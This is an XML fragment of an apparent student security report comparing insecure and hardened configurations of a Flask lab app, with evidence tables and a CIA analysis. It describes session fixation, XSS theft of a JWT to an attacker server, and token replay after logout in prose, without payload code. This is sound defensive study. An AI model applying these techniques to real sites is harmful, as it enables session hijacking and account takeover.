            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.9 Test approach and evidence collection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each scenario follows the same evidence template so the resulting comparison in Sprint 3 is consistent: a short prerequisites checklist, the exact reproduction steps, the artefacts captured (screenshots, headers, pcap excerpts, log lines), and the observation expressed in plain language. Evidence is stored under evidence/SX/ in the repository and referenced from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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Captured with</w:t>
            </w:r>
          </w:p>
        </w:tc>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Stored as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Request and response headers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DevTools / curl -v</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.txt under evidence/SX/headers/</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Network captures (cookie path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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tcpdump on the docker bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>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.pcap under evidence/SX/pcap/</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screenshots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OS screenshot tool</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.png under evidence/SX/screens/</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Server logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Flask app log + access log</w:t>
            </w:r>
          </w:p>
        </w:tc>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.log under evidence/SX/logs/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Decoded JWT payloads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jwt.io offline / pyjwt CLI</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.json under evidence/SX/jwt/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.10 Responsible disclosure considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The proof of concept is built from scratch by the student inside an isolated environment, so there is no third-party vendor to notify for the vulnerabilities under study. Each weakness studied is a well-documented class (cf. OWASP Top 10 A01/A07, OWASP ASVS V3 Session Management) rather than a novel zero-day. If, during literature work or during incidental observation, a serious vulnerability in a third-party product is discovered, the project will follow the NCSC responsible disclosure guideline: notify the vendor first, allow a reasonable remediation window, and only publish after coordinated disclosure. No third-party system is tested as part of this project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Sprint 3 — Optimise &amp; Validate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sprint 3 hardened the proof of concept by activating the SECURE configuration profile, ran all four attack scenarios against the improved application to verify that each mitigation was effective, and produced the CIA and risk analyses. All changes are configuration-driven: switching from InsecureConfig to SecureConfig is the only deployment change required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Improved (secure) implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SECURE profile is defined in app/config.py (class SecureConfig). The following changes were applied relative to the INSECURE profile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">S1 — Cookie security attributes (config.py SecureConfig).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SESSION_COOKIE_SECURE=True prevents the cookie from being transmitted over plain HTTP. SESSION_COOKIE_HTTPONLY=True removes the cookie from the JavaScript document.cookie API. SESSION_COOKIE_SAMESITE="Lax" restricts cross-site cookie sending, mitigating CSRF. SESSION_USE_SIGNER=True adds a cryptographic signature to the session ID. These four flags are set in a single configuration class and require no code changes to route handlers or templates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">S2 — Session ID regeneration (auth_session.py, config.py).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> REGENERATE_SESSION=True causes login_user_session() to call session.clear() before writing the authenticated user ID. With flask-session’s filesystem backend, session.clear() deletes the server-side session file for the pre-login ID and causes flask-session to issue a brand-new ID in the response cookie. The planted session ID becomes an orphan: it points to a non-existent file and will never be authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">S3 — Token storage (config.py, routes.py).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT_STORAGE="httponly_cookie" causes the /api/login endpoint to deliver the token as an HttpOnly, Secure, SameSite=Strict cookie rather than in the JSON response body. No token value is placed in window.localStorage or any JavaScript-accessible storage. A same-origin script cannot read an HttpOnly cookie, so even if a stored-XSS payload executes, it cannot obtain the token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">S4 — Server-side token revocation (auth_jwt.py, models.py).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JWT_REVOCATION=True activates two changes: revoke_token() inserts the token’s jti claim into the RevokedToken deny-list (SQLite table revoked_tokens) at logout, and verify_token() checks the deny-list on every protected request. JWT_EXPIRY_SECONDS=300 (five minutes, down from 3600) limits the exploitation window even if revocation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Security response headers (__init__.py).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> An after_request hook is registered in the application factory and fires on every response in SECURE mode. Four headers are added: Content-Security-Policy (default-src 'self'; script-src 'self'; object-src 'none') restricts scripts to the same origin and blocks fetch() calls to external attacker-controlled destinations, directly neutralising the exfiltration step of scenario S3. X-Content-Type-Options: nosniff prevents MIME-type sniffing. X-Frame-Options: DENY blocks clickjacking. Strict-Transport-Security (max-age=31536000; includeSubDomains) instructs browsers to enforce HTTPS for one year. None of these headers are present in INSECURE mode, preserving the realistic attack surface for comparative demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JWT bearer route — HttpOnly cookie reading (routes.py).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The jwt_required decorator was extended to check the access_token HttpOnly cookie as a fallback when no Authorization: Bearer header is present. This makes the SECURE-mode JWT flow fully functional end-to-end: the browser attaches the cookie automatically on same-origin requests, the decorator reads it, and all @jwt_required routes (/api/me, /api/notes, /api/logout) work without the token ever appearing in JavaScript. The INSECURE flow is unaffected: it continues to use the Authorization header with a localStorage-sourced token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Comparative evaluation (insecure vs. secure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each scenario was executed against both profiles using the same reproduction steps defined in section 4.7. The table below shows the outcome, the observable change in request/response behaviour, and the residual risk after the mitigation is applied.</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100"/>
        <w:gridCol w:w="1926"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">INSECURE result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">SECURE result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Residual risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S1 — Missing cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie sent without Secure, HttpOnly, SameSite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie visible in tcpdump pcap; readable via document.cookie; sent on cross-site requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie absent from HTTP traffic; document.cookie returns empty string; SameSite=Lax blocks cross-site submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Very low. HSTS is now applied via the security_headers hook (max-age=31536000). Full protection requires HTTPS transport, which is active in the SECURE profile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S2 — Session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Session ID not regenerated on login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie value identical before and after login (cookie_before_login.png, cookie_same_after_login.png). Attacker browser accesses victim dashboard (attacker_dashboard_takeover.png)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">New session ID issued on login; planted ID returns HTTP 302 to login with empty session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Low. Residual risk limited to active MitM under HTTPS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S3 — XSS token theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT in localStorage; XSS sink in notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS payload fires; attacker server logs exfiltrated JWTs (tokens.log). curl with stolen token returns HTTP 200 with victim data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Token in HttpOnly cookie; localStorage.getItem("jwt") returns null. CSP header (default-src 'self') blocks the fetch() exfiltration call even if an XSS payload executes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Low. SameSite=Strict on the JWT cookie handles CSRF. Output escaping applied in SECURE template. CSP blocks external fetch calls as defence in depth.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S4 — Broken logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1926" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">No server-side token revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Captured token accepted by /api/me after logout; server returns HTTP 200 (server_after_logout.png)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Captured token rejected with HTTP 401 ("Token has been revoked") immediately after logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Very low. Deny-list in SQLite; Redis preferable at scale.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 CIA analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The CIA analysis assesses confidentiality (exposure of protected data), integrity (unauthorised actions), and availability (service disruption). Ratings: HIGH / MEDIUM / LOW.</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100"/>
        <w:gridCol w:w="1826"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="2700"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Reasoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S1 — Missing cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826"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2700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
